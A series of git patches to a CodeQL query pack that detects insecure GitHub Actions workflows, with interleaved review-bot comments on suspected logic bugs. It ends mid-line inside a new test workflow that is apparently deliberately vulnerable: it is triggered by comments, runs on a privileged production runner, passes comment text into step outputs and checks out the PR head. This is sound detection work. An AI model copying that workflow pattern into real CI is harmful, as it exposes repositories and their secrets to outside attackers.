From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:07:35 +0200 Subject: [PATCH 0510/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0e019d05e86..285f9cfe523 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.44 +version: 0.1.45 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 83c273431e1..3c02acfff19 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.44 +version: 0.1.45 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4f075f3f36679d9b289585bd967889c7def84104 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 13:38:08 +0200 Subject: [PATCH 0511/1267] feat: Improve sanitizer checks --- ql/lib/codeql/actions/Helper.qll | 3 +- .../codeql/actions/security/ControlChecks.qll | 148 +++++++++++------- .../config/externally_triggereable_events.yml | 5 +- .../Security/CWE-074/OutputClobberingHigh.ql | 14 +- .../CWE-077/EnvPathInjectionCritical.ql | 14 +- .../CWE-077/EnvVarInjectionCritical.ql | 19 ++- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 6 + .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CWE-349/CachePoisoningViaDirectCache.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 7 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 31 +++- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 23 ++- .../CWE-829/.github/workflows/test11.yml | 94 +++++++++++ .../CWE-829/.github/workflows/test12.yml | 96 ++++++++++++ .../CWE-829/.github/workflows/test13.yml | 31 ++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 11 +- .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 21 files changed, 450 insertions(+), 81 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 1d88f6f6511..9ac67575b8b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -248,8 +248,7 @@ predicate inPrivilegedCompositeAction(AstNode node) { predicate inPrivilegedExternallyTriggerableJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() and - not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 2d8e60dca37..650ae8d8105 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,17 +1,46 @@ import actions +string any_relevant_category() { + result = + [ + "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", + "command-injection", "argument-injection", "code-injection", "cache-poisoning", + "untrusted-checkout-toctou", "artifact-poisoning" + ] +} + +string any_non_toctou_category() { + result = any_relevant_category() and not result = "untrusted-checkout-toctou" +} + +string any_relevant_event() { + result = + [ + "pull_request_target", + "issue_comment", + "pull_request_comment", + "workflow_run", + "issues", + "fork", + "watch", + "discussion_comment", + "discussion" + ] +} + /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends AstNode { ControlCheck() { this instanceof If or this instanceof Environment or - this instanceof UsesStep + this instanceof UsesStep or + this instanceof Run } - predicate protects(Step step, Event event) { + predicate protects(Step step, Event event, string category) { event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and - this.getAProtectedEvent() = event.getName() and - this.dominates(step) + this.dominates(step) and + this.protectsCategoryAndEvent(category, event.getName()) } predicate dominates(Step step) { 
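Review bot: `inPrivilegedExternallyTriggerableJob` in Helper.qll no longer excludes jobs guarded by a `ControlCheck`, and nothing on the predicate says so; every caller now has to add its own `not exists(ControlCheck check | check.protects(...))` with a category, as the query hunks in this commit do. A QLDoc line such as `/** Holds if node is in a privileged, externally triggerable job; control checks are not considered here. */` would stop a future query from assuming the old behaviour. The predicate's other callers are outside the hunk, so it is worth checking that none relied on the removed exclusion.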
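Review bot: `protects(Step step, Event event, string category)` in ControlChecks.qll can only hold when its first argument is a `Step`, but the query hunks in this commit call it with `sink.getNode().asExpr()` and `source.getNode().asExpr()`. If those values are expression nodes inside a step rather than the step itself (their type is not visible here), the call never holds and no control check ever suppresses those alerts. Declaring it as `predicate protects(AstNode node, Event event, string category)` and letting `dominates` work on the node's enclosing step would cover both cases. The bodies of `protects` and `dominates` continue in the next hunk.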
@@ -30,80 +59,71 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(UsesStep).getAFollowingStep() = step + this.(Step).getAFollowingStep() = step } - abstract string getAProtectedEvent(); - - abstract boolean protectsAgainstRefMutationAttacks(); + abstract predicate protectsCategoryAndEvent(string category, string event); } abstract class AssociationCheck extends ControlCheck { - // checks who you are (identity) - // association checks are effective against pull requests since they can control who is making the PR - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // Checks if the actor is a COLLABORATOR of the repo + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class ActorCheck extends ControlCheck { - // checks who you are (identity) - // actor checks are effective against pull requests since they can control who is making the PR - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - override string 
getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks for a specific actor + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class RepositoryCheck extends ControlCheck { - // repository checks are effective against pull requests since they can control where the code is coming from - // they are not effective against issue_comment since the repository will always be the same - // who you are (identity) - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks that the origin of the code is the same as the repository. 
+ // for pull_requests, that means that it triggers only on local branches or repos from the same org + // - they are effective against pull requests/workflow_run since they can control where the code is coming from + // - they are not effective against issue_comment since the repository will always be the same + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class PermissionCheck extends ControlCheck { - // permission checks are effective against pull requests since they can control who can make changes - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - // who you are (identity) - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks that the actor has a specific permission level + // - they are effective against pull requests/workflow_run since they can control who can make changes + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run", "issue_comment"] and + category = any_relevant_category() + } } abstract class LabelCheck extends ControlCheck { - // does it protect injection attacks but not pwn requests? 
- // pwn requests are susceptible to checkout of mutable code - // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things - // they do actually protext against untrusted code execution (sha) - // what you have (approval) - // TODO: A check should be a combination of: - // - event type (pull_request, issue_comment, etc) - // - category (untrusted mutable code, untrusted immutable code, code injection, etc) - // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects - // - we can decide if a control check is effective based only on the ast node - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - // ref can be mutated after approval - override boolean protectsAgainstRefMutationAttacks() { result = false } + // checks if the issue/pull_request is labeled, which implies that it could have been approved + // - they dont protect against mutation attacks + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + } } class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks - // they do actually protext against untrusted code execution (sha) - // what you have (approval) - EnvironmentCheck() { any() } + // they do actually protect against untrusted code execution (sha) + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + } +} - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - // ref can be mutated after approval - override boolean protectsAgainstRefMutationAttacks() { result = false } +abstract class CommentVsHeadDateCheck extends ControlCheck { + override predicate 
protectsCategoryAndEvent(string category, string event) { + // by itself, this check is not effective against any attacks + none() + } } /* Specific implementations of control checks */ @@ -184,6 +204,12 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "sushichop/action-repository-permission" and + this.getArgument("required-permission") = ["write", "admin"] + or + this.getCallee() = "prince-chrismc/check-actor-permissions-action" and + this.getArgument("permission") = ["write", "admin"] + or this.getCallee() = "lannonbr/repo-permission-check-action" and this.getArgument("permission") = ["write", "admin"] or @@ -195,3 +221,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { ) } } + +class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { + BashCommentVsHeadDateCheck() { + exists(string line | + line = this.getScript().splitAt("\n") and + line.toLowerCase() + .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + ) + } +} diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 88d17c728b7..028671c243d 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -6,13 +6,14 @@ extensions: - ["discussion"] - ["discussion_comment"] - ["fork"] + - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] + - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow + - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller 
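Review bot: In `PermissionCheck`, the comment says permission checks "are not effective against issue_comment", yet the override lists `"issue_comment"` among the protected events with `category = any_relevant_category()`, which includes `"untrusted-checkout-toctou"`. One of the two is wrong: if the comment is right, alerts on comment-triggered workflows are suppressed by a check that says nothing about the pull request head changing after the comment was written. If the code is right, the comment should state why checking the commenter's permission is sufficient. Until that is settled I would keep `event = ["pull_request_target", "workflow_run"]` here, or pair `"issue_comment"` with `any_non_toctou_category()` only.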
diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index c53489f9628..0ead5aa7689 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph +import codeql.actions.security.ControlChecks from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink where @@ -23,9 +24,20 @@ where inPrivilegedContext(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or sink.getNode() instanceof WorkflowCommandClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 4ff86eb0fbd..9fa066d195c 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
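Review bot: The non-artifact branch of OutputClobberingHigh.ql asks the checks about `"code-injection"` although `any_relevant_category()` in ControlChecks.qll defines `"output-clobbering"`; the same literal is used in the EnvPathInjectionCritical.ql and EnvVarInjectionCritical.ql hunks, where `"envpath-injection"` and `"envvar-injection"` exist. Every check in this commit maps to `any_relevant_category()` or `any_non_toctou_category()`, so results do not change today, but the first check that distinguishes these categories would silently apply the code-injection answer here. I would pass the query's own category, i.e. `source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "output-clobbering")`. EnvVarInjectionCritical.ql also tests `"envvar-injection"` at the top of its `where`, so its `"code-injection"` test in the first branch duplicates that.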
@@ -15,15 +15,27 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 89e1ddd3cc2..806bae2a91d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
@@ -16,16 +16,33 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + ) and // exclude paths to file read sinks from non-artifact sources ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or madSink(sink.getNode(), "envvar-injection") diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index affa372f14e..6f1f6008a06 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql 
@@ -14,11 +14,17 @@ import actions import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 9319718b7fc..ec4925d24a0 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,11 +17,17 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 685bdcca401..67b615d115a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql 
@@ -26,7 +26,9 @@ where // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + ) and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index ea36bcf0be1..b6df022329d 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -57,7 +57,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index ee2719f0611..0750a02930e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql 
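Review bot: The context comment `// the checkout is not controlled by an access check` above the changed guard in CachePoisoningViaCodeInjection.ql no longer describes the code, which now asks for a check in the "code-injection" category on the injection source rather than on a checkout step. I would reword it to `// the injection source is not guarded by a control check for code injection`. The where clause starts and ends outside the hunk.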
@@ -34,7 +34,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a97309ce187..7c7ab15de31 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -24,11 +24,10 @@ where // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 0a83cc54ad6..7f584e00c9a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
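Review bot: In the UntrustedCheckoutTOCTOUCritical.ql hunk the two `j.getATriggerEvent()` calls are evaluated independently, so for a job with several triggers the positive `"untrusted-checkout"` conjunct can be satisfied by one event and the negated `"untrusted-checkout-toctou"` conjunct by another. The result then pairs a check with a trigger it was never evaluated against. Binding the event once keeps both tests on the same trigger: `exists(Event ev | ev = j.getATriggerEvent() and check.protects(checkout, ev, "untrusted-checkout") and not check.protects(checkout, ev, "untrusted-checkout-toctou"))`. The UntrustedCheckoutTOCTOUHigh.ql hunk has the same two lines. The hunk also drops `check.dominates(checkout)`, which is only safe if `protects` already requires dominance; that predicate is not shown here.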
@@ -22,11 +22,10 @@ where // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 2026a784d05..499abc047b6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
@@ -20,10 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep step where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) -select s, checkout, s, "Execution of untrusted code on a privileged workflow." + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event event | + event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + ) + ) +select step, checkout, step, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 0675603af0f..8577218800e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
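Review bot: Resolving the trigger through `checkout.getEnclosingJob().getATriggerEvent()` in both new `exists(Event event | ...)` branches appears to drop checkouts that live in a local composite action, presumably because such a step has no enclosing job of its own. The expected-results update in this same commit removes the `untrusted_checkout3.yml` row whose checkout is `.github/actions/dangerous-git-checkout/action.yml:6:7:11:4`, which looks like a lost true positive rather than an intended suppression. Taking the event from a node that does sit in a job, for example `event = step.getEnclosingJob().getATriggerEvent()`, or adding a comment that composite-action checkouts are deliberately out of scope, would make the change explicit.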
@@ -23,5 +23,26 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event e | + e.getName() = "issue_comment" and + checkout.getEnclosingJob().getATriggerEvent() = e and + not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | + (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and + write_check.dominates(checkout) and + data_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + not exists(ControlCheck check | + check + .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") + ) + ) + ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml new file mode 100644 index 00000000000..16bb6bf876c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml 
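Review bot: In the second branch, `exists(Event event | not event.getName() = "issue_comment" and ...)`, the variable `event` is never related to the checkout's job, so it is satisfied by any non-`issue_comment` event in the database and the inner `protects` call still ranges over all triggers of the job, including `issue_comment`. The Critical query binds it, and this branch should do the same: `event = checkout.getEnclosingJob().getATriggerEvent() and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout"))`. The `issue_comment` branch here accepts only `ActorCheck` and `AssociationCheck` where the Critical query also accepts `PermissionCheck`; the two lists should match, or a comment should say why they differ. `data_check` looks like a typo for `date_check`.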
@@ -0,0 +1,94 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ 